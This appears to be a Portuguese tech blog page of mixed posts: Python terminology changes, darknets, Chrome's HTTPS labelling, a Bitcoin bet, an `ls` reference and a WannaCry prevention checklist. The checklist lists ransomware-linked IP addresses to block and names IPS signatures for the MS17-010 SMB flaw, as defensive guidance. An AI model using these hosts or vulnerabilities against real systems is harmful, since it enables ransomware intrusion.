|          4 | Lithgow              |
|          5 | Bowden               |
+------------+----------------------+
10 rows in set (0.01 sec)
 
 

Python remove termos “mestre” e “escravo” por serem considerados ofensivos

A linguagem de programação Python, uma das mais populares do mundo, vai deixar de usar os termos “mestre” e “escravo”. Em tecnologia, essas palavras se referem a um componente que tem controle total sobre outros (master), ou que é controlado por outros componentes (slave). No entanto, isso motivou um debate acalorado sobre escravidão e diversidade.


“Por motivos de diversidade, seria bom tentar evitar a terminologia ‘mestre’ e ‘escravo’, que pode ser associada à escravidão”, escreve Victor Stinner, desenvolvedor na Red Hat. Ele fez um “pull request” — uma proposta de mudança no código — para remover os dois termos da linguagem Python.
Assim começou uma enorme discussão com argumentos a favor e contra a proposta. O criador do Python, Guido van Rossum, se aposentou em julho mas voltou para resolver a polêmica: “três dos quatro pull requests de Victor foram mesclados”, isto é, foram aceitos.
Daqui para a frente, o termo “escravo” será substituído por “workers” ou “helpers”, e “master process” virou “parent process”.
Nos comentários, o desenvolvedor Raymond Hettinger foi um dos que discordou da mudança: “não deveríamos deixar que noções vagas do politicamente correto moldem usos do inglês”, ele escreve. “É realmente necessário poluir a base de código do Python com a ideologia/terminologia de SJWs [justiceiros sociais]?”, perguntou Gabriel Marko.

 O mais interessante disso foi os comentários dos internautas, veja alguns:

"Como assim PARENT process?
Isso ofende muito os órfãos. Quem é o sem coração que quer ofender órfãos?"

"Minha opinião sobre esse assunto se resume a uma palavra: FRESCURA!"

"Fui até um depósito de hardware antigo e removi os jumpers de TODOS os dispositivos IDE que encontrei, agora são todos iguais."

 

Depois da Deep Web ...

Uma darknet (or dark net) é uma parte do espaço IP alocado e roteado que não está executando nenhum serviço. O tráfego que chega a esse espaço escuro de IP é indesejado, pois não possui hosts ativos.
O termo dark net foi confundido erroneamente com a Dark web, que é uma rede sobreposta que pode ser acessada apenas com software, configurações ou autorização específicas, geralmente usando protocolos de comunicação e portas não padrões. Os tipos de dark web são redes friend-to-friend[2] (geralmente usada para used for compartilhamento de arquivos com uma conexão peer-to-peer)[3] (geralmente usadas para compartilhamento de arquivos com uma conexão peer-to-peer) e redes de privacidade como o Tor.
O termo recíproco para darknet encriptada é clearnet ou Surface Web quando se refere ao conteúdo indexável por mecanismo de pesquisa.

 De uma maneira geral, uma darknet é um grupo que permite compartilhar todo tipo de conteúdo de maneira anônima, sendo impossível identificar o usuário, e também privativa pois os arquivos disponibilizados são criptografados. Desse modo, darknets são utilizadas para compartilhar informações sigilosas.


Google torna HTTPS como protocolo padrão na internet

Até hoje, era normal encontrar a palavra “Seguro” na cor verde ao lado do HTTPS em diversos sites na internet. Porém, a Google entende que isso, agora, é o novo padrão da internet e não necessita de tanto alarde — e vai alertar os usuários com cores diferentes apenas quando o protocolo HTTPS não for utilizado.
Essa mudança estava marcada para acontecer em setembro com o Chrome 69. Contudo, a Google adiantou a novidade para a versão 68 do navegador. Dessa maneira, sites com protocolo HTTP aparecerão como “Inseguros” para os usuários do browser, com a palavra “Seguro” aposentada do HTTPS.
Como notamos anteriormente, a dica de ouro é: um site com protocolo HTTPS não significa que é realmente seguro. Hoje, muitos cibercriminosos já colocam no ar domínios com o protocolo HTTPS que têm a capacidade de roubar senhas e informações de usuários. O que isso significa? Não clique em links desconhecidos, principalmente se forem enviados para você — e não confie 100% em sites com o cadeado verde na barra de link.
Segundo a Google, "os usuários devem esperar que a web seja segura por padrão", por isso vai realizar a mudança.

Prevenção essenciais contra o WanaCry

Para a segurança de sua empresa, elaboramos a seguir uma série de medidas de prevenção  essenciais e urgentes para que você não seja mais uma vítima do WanaCry. Muitos fabricantes já estão detectando as primeiras variantes dos ataques, contudo, para realmente mitigar o risco é preciso executar algumas ações de prevenção no ambiente. A criticidade dessa campanha de ransomware ocorre devido a utilização do exploit EternalBlue/DoublePulsar descrita no MS17-010.
Os clientes de Serviços Gerenciados já estão com essas medidas sendo implementadas em seus ambientes através da equipe do SOC Real Protect.

Medidas de Prevenção essenciais contra o WanaCry:

Recomendamos que as ações abaixo sejam efetuadas o mais rapidamente possível:

No perímetro de sua rede:

  • Bloquear o uso e download da aplicação TOR no APP Control para todo ambiente;
  • Garantir que as funções de antimalware estejam habilitadas e atualizadas no Firewall, UTM ou NextGenFW;
  • Bloquear o download de arquivos executáveis no Filtro Web (Certifique-se que o HTTPs está sendo inspecionado);
  • Bloquear anexos de arquivos executáveis no Filtro de Email;
  • Garantir que o Filtro Web e Filtro de Email estejam com a vacina atualizada;
  • Bloqueio de urls e endereços IP no Filtro Web que estão relacionadas ao ransomware (171.25.193.9 | 95.130.11.147 | 82.223.21.74 | 51.15.48.254 | 91.121.230.218 | 62.210.125.130);
  • Habilitar as regras no Network IPS para proteção da vulnerabilidade CVE -2017-0143;
  • Garantir que as regras de firewall não permitam o redirecionamento de tráfego na porta 445 para redes protegidas;

Nas estações e servidores:

  • Garantir que todos os computadores estão com o antimalware instalado e atualizado com a vacina hoje;
  • Aplicar os patches de atualização relacionados à vulnerabilidade MS17-010;
  • Garantir que o backup esteja atualizado e isolado do restante da rede;
  • Habilitar regras de Host IPS para o CVE -2017-0143;
  • Bloqueio de gravação de arquivos de extensão *.Wcry nas estações e servidores.

Informações Adicionais:

  • Recomendamos que seja realizado o monitoramento contínuo do ambiente em busca de atividades suspeitas;
  • Em caso de suspeita de equipamento contaminado, é recomendado isolar o equipamento da rede imediatamente;
  • Lista de IP’s a serem bloqueados: 171.25.193.9 | 95.130.11.147 | 82.223.21.74 | 51.15.48.254 | 91.121.230.218 | 62.210.125.130
  • Assinaturas de IPS disponíveis no FortiGate: MS.SMB.Server.SMB1.WriteAndx.Trans2.Secondary.Code.Execution
MS.SMB.Server.SMB1.Trans2.Secondary.Handling.Code.Execution
MS.Office.RTF.File.OLE.autolink.Code.Execution

Australiano aposta US$6 milhões que o preço Bitcoin passará de US$288 mil até 2023


Australiano aposta US$6 milhões que o preço Bitcoin passará de US$288 mil até 2023
Por

Adicionar legenda

Insatisfeito com as constantes críticas deWarren Buffet ao Bitcoin (BTC), que já chegou a chamar a criptomoeda de “bolha” e de “veneno de rato ao quadrado”, um investidor anônimo australiano resolveu apostar que o preço do BTC vai superar o preço da ação do conglomerado Berkshire Hathaway, cujo CEO é o próprio Buffet, até 2023.
E a aposta não é nada modesta, afinal de acordo com Tom Waterhouse, diretor executivo da casa de apostas William Hill Austrália (onde a aposta foi feita), o montante apostado é de AUD$8,5 milhões, cerca de US$6,28 milhões. Entretanto a aposta é talvez menos dolorosa que a de John McAfee, que prometeu comer seu pênis caso o BTC não atinja US$1 milhão até 2020.
Atualmente, as ações Classe A da Berkshire Hathaway, contra a qual a aposta foi firmada, estão sendo negociadas acima de US$288 mil, mostrando assim que o BTC tem um longo caminho a percorrer. Caso o investidor australiano ganhe esta aposta, ela renderá, nas taxas atuais, cerca de US$890 milhões.

Tudo sobre o comando LS | LINUX

Manipulando o ls

 

A sintaxe do comando ls consiste em iniciar com o próprio comando seguido de opções ou parâmetros que por sua vez podem representar diversas situações e requisitos. Haverá diversas necessidades de se obter conhecimento de determinado arquivo em diretório, portanto a tabela abaixo apresenta uma série de argumentos e situações que podem ser encontradas no dia-a-dia de administradores de sistemas.

Tabela de parâmetros:

Opção Especificação
-a, --allNão ignora entradas começando com .
-A, --almost-allNão lista as entradas implícitas . e ..
--authorCom -l, emite o autor de cada arquivo
-b, --escapeEmite escapes em octal para caracteres não-gráficos
--block-size=TAMANHOUsa blocos de TAMANHO bytes
-B, --ignore-backupsNão lista as entradas implícitas terminadas com ~
-cCom -lt: ordena por, e mostra, ctime. Com -l: mostra o ctime e ordena por nome
-CLista as entradas em colunas
--color[=QUANDO]Controla se usa cores para distinguir os tipos de arquivo. QUANDO pode ser "never" (nunca), "always" (sempre) ou "auto" (automaticamente)
-d , --directory Lista os diretório em vez de seu conteúdo e não interpreta ligações simbólicas
-D, --diredGera a saída projetada para modo "dired" do Emacs
-f Não ordena, habilita -aU, desabilita -ls --color
-F, --classify Anexa indicador (um dos */=>@|) às entradas
--file-typeSimilar, exceto que não anexa "*"
--format=PALAVRA"across" (-x), "commas" (-m), "horizontal" (-x), "long" (-l), "single-column" (-1), "verbose" (-l), "vertical" (-C)
--full-timeO mesmo que -l --time-style=full-iso
--group-directories-firstLista os diretórios antes de listar os arquivos. Permite usar a opção --sort, mas o uso de --sort=none (-U) desabilita o agrupamento de diretórios.
-G, --no-groupEm lista longa (-l), não emite os nomes de grupo
-h, --human-readableCom -l, emite os tamanhos em formato inteligível
--siSimilar, mas usa potências de 1000, e não de 1024
-H, --dereference-command-lineSegue as ligações simbólicas listadas na linha de comando
--dereference-command-line-symlink-to-dirSegue toda ligação simbólica da linha de comando que apontar para um diretório
--hide=PADRÃONão lista entradas implícitas que coincidam com o PADRÃO em sintaxe shell (ignorado quando se usa -a ou -A)
--indicator-style=PALAVRAAnexa o indicador de tipo no estilo PALAVRA para os nomes das entradas: "none" (nenhum, padrão), "slash" (-p), "file-type" (--file-type), "classify" (-F) "file-type" (--file-type), "classify" (-F)
-i, --inodeEmite o número de índice de cada arquivo
-I, --ignore=PADRÃONão lista as entradas implícitas que coincidam com o PADRÃO (em sintaxe shell)
-kO mesmo que –block-size=1K
-lUsa o formato de lista longa
-L, --dereferenceQuando mostrar informações de uma ligação simbólica, mostra as do arquivo a quem ela referencia, e não do arquivo tipo ligação em si
-mPreenche toda a largura com uma lista de entradas separadas por vírgula
-n, --numeric-uid-gidComo -l, mas lista usuário e grupo em números ID
-N, --literalEmite nomes de entradas de forma crua (não trata, por exemplo, caracteres de controle de forma especial)
-oComo -l, mas não lista informações sobre o grupo
-p, --indicator-style=slashAnexa o indicador / aos diretórios
-q, --hide-control-charsEmite ? ao invés de caracteres não gráficos
--show-control-charsEmite caracteres não gráficos como são (padrão seja um terminal)
-Q, --quote-nameColoca os nomes das entradas entre aspas
--quoting-style=PALAVRAUsa estilo de citação PALAVRA para os nomes das entradas: Palavra = literal, locale, shell, shell-always, c, escape
-r, --reverseInverte a ordem de ordenação
-R, --recursiveLista subdiretórios recursivamente
-s, --sizeMostra o tamanho alocado para cada arquivo, em blocos
--sort=PALAVRAOrdena por PALAVRA em vez de pelo nome: none -U, extension -X, size -S, time -t, version -v (nenhum, extensão, tamanho, hora, versão)
--time=PALAVRACom -l, mostra a hora como PALAVRA em vez do horário de modificação: Palavra: atime -u, access -u, use -u: último acesso, ctime -c, status -c: última modificação; usa o horário especificado como chave de ordenação se --sort=time
--time-style=ESTILOCom -l, emite os horários usando o estilo ESTILO: FORMATO é interpretado como em "date"; se for FORMATO1, FORMATO2, FORMATO1 se aplica a arquivos não recentes, e FORMATO2 aos recentes; se ESTILO tem como prefixo "posix-", ESTILO só faz efeito fora da localidade POSIX
-tOrdena pelo horário de modificação
-T --tabsize=COLAssume paradas de tabulação a cada COLS em vez de 8
-ucom -lt: ordena e exibe por data de acesso com -l: exibe o tempo de acesso e ordena por nome sem nenhum parâmetro, ordena por data de acesso
-UNão ordenar; exibe as entradas na ordem do diretório
-vOrdena pela ordem natural dos números de versão dentro do texto
-w, --width=COLSAssume a largura da tela como COLS
-xLista as entradas por linha em vez de por coluna
-XOrdena por ordem alfabética das extensões das entradas
-Z, --contextEmite qualquer contexto de segurança SELinux de cada arquivo
-1Lista arquivos por linha
--helpExibe a ajuda
--versionInforma a versão


Pode-se encontrar algumas situações em que o uso avançado do comando ls poderá ajudar na resolução de diversas tarefas que aparecem no nosso cotidiano, portanto será necessário conhecer de forma completa ou parcial para que as mesmas possam ser executadas resultando em minimizar esforços ou até mesmo solucionar problemas complexos que se baseavam em detalhes pouco observados.

Há momentos que precisaremos de modificar ou configurar arquivos no sistema que estão ocultos ou até mesmo listar arquivos em diretórios que estão ocultos, vale lembrar que arquivos ocultos e diretórios ocultos começam com um . (ponto) no início. Mas como eu posso encontrar arquivos ocultos em meus sistema? Simples! O seu diretório /home/usuário possui diversos arquivos que são responsáveis por manter as configurações de softwares e perfil do usuário, portanto será necessário usar um parâmetro especial para lista-los, o -a. Dê o seguinte comando no terminal para listar os arquivos e diretórios ocultos.

ls -a
.
.adobe
.aMule
.fontconfig
.profile
...

Como podem ver esse exemplo, os arquivos (o resultado está resumido) e diretório com . (ponto) estão ocultos, que naturalmente não estão visíveis na HOME do usuário. A opção -b apresenta na saída padrão todos os arquivos que contém escapes. Escapes são caracteres não gráficos que separam as palavras no nome de arquivos. Por exemplo: quando vemos arquivos em modo gráfico naturalmente não vemos os caracteres de escapes, se víssemos o nome do arquivo em modo gráfico seria visto da seguinte maneira:

Visto em modo gráfico:

Implementando Servidor de Aplicações PHP com Zend Framework.odt

Em modo texto com a opção -b:

Implementando\ Servidor\ de\ Aplicações\ PHP\ com\ Zend\ Framework.odt

Portanto essa opção é valida para situações em que é necessário verificar quais arquivos possuem caracteres de escapes.

Em algumas distribuições GNU/Linux o comando ls não faz distinção de cores em arquivos e diretórios, porém o parâmetro --color pode ter três argumentos: nunca colorir (none), sempre colorir (always), colorir automaticamente, que exige o parâmetro auto e surtirá efeito desde que a saída padrão esteja associada a um terminal (tty).

Sendo assim o comando "ls --color=none" não fará a distinção de cores, para que isso aconteça é preciso usar o argumento always da seguinte forma: "ls --color=always" ou usar a opção auto.

Similar e mais complexo que o parâmetro none, podemos usar a "ls -f", que desabilitará o suporte a cores e exibirá arquivos ocultos, nada mais é do que a junção de "ls -aU" e "ls --color=none". Também com a opção -F pode-se anexar indicadores nos arquivos classificando-os com símbolos que pode caracterizar arquivos e diretórios, os caracteres usados são:
  • * - Arquivos executáveis
  • / - Para diretórios
  • > - Aponta de onde está vindo link simbólico
  • @ - Para link simbólico
  • = - Soquete

Utilizando o comando "ls --classify" ele informará no final do arquivo em qual classe se em enquadra o arquivo, por isso é importante saber os caracteres acima. A opção --file-type possui o mesmo papel, porém não exibe os arquivos executáveis. Usar o --format=Palavra exigirá o uso de argumentos que podem corresponder a opções de separação por vírgula (commas), ordenar em uma única (1), como mostra a tabela abaixo:

ArgumentoExemplo
"across" (-x)ls --format= across
"commas" (-m)ls --format= commas
"horizontal" (-x)ls --format= horizontal
"long" (-l)ls --format=long
"single-column" (-1)ls --format=single-column
"verbose" (-l)"ls --format= verbose
"vertical"ls --format= vertical


A opção --full-time é semelhante à opção -l, mas não lista o dono do arquivo.

Na maioria das situações nos deparamos com a necessidade de saber qual é o tamanho dos arquivos, seja para fazer uma transferência via rede, ou movê-lo para um outro diretório qualquer, neste caso a opção -h irá acrescentar uma coluna na saída padrão do comando contendo o tamanho do arquivo, porém é necessário usar o parâmetro -l para que a coluna apareça. Abaixo se as opções de uso e os respectivos argumentos:

O argumento -i refere-se ao número de índice de cada arquivo no sistema que são chamados de inodes, ou seja, cada arquivo é identificado por um número. Eles estão em um local reservado em seu disco rígido. Na figura abaixo a primeira coluna mostra o número identificador do arquivo.
Podemos usar argumentos para verificar o tamanho de arquivos desejados. Especificando o tamanho do arquivo podemos encontrar dentre vários arquivos um arquivo com o tamanho especificado. Por exemplo: entre vários arquivos em um diretório é possível listar somente os que possuem tamanho de 10k com o seguinte argumento --block-size=10K.

Descrever o uso do tradicional parâmetro -l é bem simples, embora seu resultado na saída padrão mostra-nos uma série de informações avançadas a respeito do arquivo. Possui o parâmetro -l, por caracterizar uma lista longa com formatos colunares. Em casos de necessidade de obter-se o resultado na saída padrão em formato de separação por vírgula (;) usa-se o parâmetro -m, como de costume o uso do formato colunar na saída padrão, essa opção é obtida de forma linear na saída padrão.

Pode-se usar várias formas na saída padrão e portanto podemos colocar na saída padrão o caractere entre aspas duplas usando o parâmetro -Q, esse tipo de procedimento pode ser usado em scripts que envolvam a possibilidade de usar os caracteres para algum fim específico.

A ordem de listagem pode ser apresentada de forma recursiva usando a opção de -r e -R. Também há a possibilidade de verificar o tamanho do espaço em disco reservado para o arquivo, a saída padrão é ordenada pelo tamanho do arquivo caso utilize a opção -s. Se houver a necessidade de ordenar a coluna por horário de modificação pode-se usar o parâmetro -t.

Também há um interessante parâmetro, o -Z, que referencia qualquer contexto de segurança SELinux de cada arquivo.

Finalizando, geralmente a exibição na saída padrão é feita em colunas que possuem informações importantes, bem como data e hora de alteração, usuário e grupo em que pertence o arquivo ou diretório, entre outras informações, dependendo da opção que subsequente ao comando.

Usualmente escrever comandos extensos podem nos custar tempo e esforço, portando pode-se customizar essas tarefas colocando comandos complexos em comandos curtos chamados alias. Um modelo pré-definido pode ser encontrado dentro do arquivo de configuração global para o alias no final do arquivo /root/.bashrc, como mostra o exemplo abaixo.

# some more ls aliases
#alias ll='ls -l'
#alias la='ls -A'
#alias l='ls -CF'

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ]; then
#    . /etc/bash_completion
#fi

Existem várias formas de se obter resultados de listagem de diretórios com o ls, bastando que os parâmetros sejam anexados um ao outro para obter um relatório contextualizado a sua necessidade. Em caso de necessidades de se obter algum tipo de informação pode-se usar o parâmetros de ajuda do próprio programa:

ls --help

O download desse arquivo pode ser feito aqui:

Você sabe o que é um "NERD" ?



A expressão "nerd" pode ser usada de várias formas. A mais comum é a que define, de maneira preconcebida e preconceituosa, às vezes até desdenhosamente, aqueles que optam por tarefas que exigem um grande esforço mental, consideradas eruditas demais para a faixa etária deles, deixando de lado eventos mais voltados ao lazer.
Infelizmente essas pessoas são comumente marginalizadas, privadas de encargos físicos e vistas como seres solitários, mas na verdade são isoladas pelos outros. Como elas se dedicam demais a determinadas atividades, e são quase sempre excluídas do convívio social, muitas vezes adquirem tendências anti-sociais, por não saberem como agir com seus colegas, e um certo jeito confuso, estabanado.
Há várias espécies de nerds. Os geeks se dedicam exclusivamente à tecnologia, aos conhecimentos científicos e à informática; os gamers são obsessivos jogadores de vídeo games; os RPGistas disputam devotadamente Role Playing Games (RPG); os Fanbase ou Fandom, grupos de fãs de uma certa obra, por exemplo, os adoradores do mundo de O Senhor dos Anéis ou do circuito Star Wars.
big_bang_theoryUma série televisiva muito aclamada atualmente, The Big Bang Theory, retrata justamente o universo destes nerds, mesclando os geeks e os fandom, brincando um pouco com a história de quatro cientistas geniais que vivem apenas para seus projetos científicos, encontram-se excluídos da vida em sociedade e a cada passagem dos episódios que protagonizam, trazem à tona informações detalhadas sobre a esfera da imaginação e da fantasia, evocando os fãs de obras fictícias.
O termo Nerd foi adotado a partir de fins dos anos 50 no MIT – Massachusetts Institute of Technology. Há quem afirme também que ele provém da expressão Northern Electric Research and Development (Departamento de Pesquisa e Desenvolvimento da Companhia Northern Electric do Canadá, hoje conhecido como Nortel), referindo-se aos funcionários do laboratório de tecnologia, os quais não dormiam para concluir mais rapidamente seus estudos.
Apenas nos anos 60 a palavra Nerd assumiu um significado depreciativo, atribuído àqueles que são considerados excepcionalmente inteligentes, deficientes na interação social, à margem das regras impostas pela sociedade. Hoje, porém, esse título está sendo cada vez mais requisitado por comunidades voltadas aos gostos mais exclusivistas, para que assim seus integrantes possam assumir uma identidade que os ajudem no reconhecimento mútuo.
Atualmente esta categoria parece estar na moda. As pessoas não se importam mais em serem definidas desta forma, e chegam até mesmo a se auto-denominarem nerds. Prova disso é o sucesso inesperado de séries e filmes que abordam esta temática e a proliferação de blogs criados por estes grupos, inclusive alguns premiados pelos internautas.
Ao contrário do que é  divulgado nas produções artísticas que apresentam personagens nerds, eles não são assim tão facilmente identificados, pois não apresentam um figurino específico, não cultivam os mesmos gostos musicais, não estão sempre presentes nos mesmos ambientes, embora possam ser facilmente encontrados em reuniões relacionadas às histórias em quadrinhos e às obras de ficção científica.

Fontes:
SCIFI NEWS – Cinema, TV, DVD – Ano 13 – Edição 140 – Outubro 2009.
http://pt.wikipedia.org/wiki/Nerd